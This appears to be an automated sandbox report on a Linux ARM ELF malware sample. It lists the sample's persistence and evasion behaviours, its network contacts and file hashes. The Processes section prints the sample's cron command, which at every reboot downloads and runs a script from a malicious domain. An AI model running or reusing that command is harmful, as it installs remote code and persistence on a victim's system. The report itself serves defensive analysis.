Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-db288szqgn
Target bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
SHA256 bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
Tags
defense_evasion discovery execution persistence privilege_escalation
score
7/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
7/10

SHA256

bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62

Threat Level: Shows suspicious behavior

The file bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf was classified as: shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:50

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:50

Reported

2024-10-27 02:53

Platform

debian9-armhf-20240611-en

Max time kernel

144s

Max time network

136s

Command Line

[/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf]

Signatures

File and Directory Permissions Modification

Tactic: defense_evasion

Description | Indicator | Process | Target
N/A         | N/A       | /bin/sh | N/A

Renames itself

Description | Indicator | Process                                                                    | Target
N/A         | N/A       | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A

Unexpected DNS network traffic destination

Description    | Indicator       | Process | Target
Destination IP | 81.169.136.222  | N/A     | N/A
Destination IP | 178.254.22.166  | N/A     | N/A
Destination IP | 51.158.108.203  | N/A     | N/A

Creates/modifies Cron job

Tactics: execution persistence privilege_escalation

Description                   | Indicator                             | Process          | Target
File opened for modification  | /var/spool/cron/crontabs/tmp.ObcLt0   | /usr/bin/crontab | N/A

Changes its process name

Description                                                      | Indicator               | Process                                                                    | Target
Changes the process name, possibly in an attempt to hide itself  | /bin/sh /etc/init.d/rcS | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A

Reads runtime system information

Tactic: discovery

Description              | Indicator         | Process                                                                    | Target
File opened for reading  | /proc/filesystems | /usr/bin/crontab                                                           | N/A
File opened for reading  | /proc/filesystems | /usr/bin/crontab                                                           | N/A
File opened for reading  | /proc/mounts      | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A

Processes

/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf

[/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country | Destination          | Domain                | Proto
DE      | 81.169.136.222:53    | kingstonwikkerink.dyn | udp
BG      | 31.13.248.89:14965   | kingstonwikkerink.dyn | tcp
DE      | 178.254.22.166:53    | kingstonwikkerink.dyn | udp
FR      | 51.158.108.203:53    | kingstonwikkerink.dyn | udp
UA      | 88.151.195.22:6847   | kingstonwikkerink.dyn | tcp

Files

/var/spool/cron/crontabs/tmp.ObcLt0

MD5    | 156ee72da2df4c852058bb0a4d6a1c57
SHA1   | ddcde4860a652c8988f3cf45cb742ae199a5c4fa
SHA256 | 22d5d14166a842a855fecf8daa2962429aac0da074dff2c5fd31a157d2e3e3f6
SHA512 | 94c14c17c65e0a2c0f1c6cbe79d480ed336c6f79ac4562ba166da7ebf765f8703502bdc8372d5079d818035efe1d7f18c16b0ab94b6e6b155dd9fd77cce78d64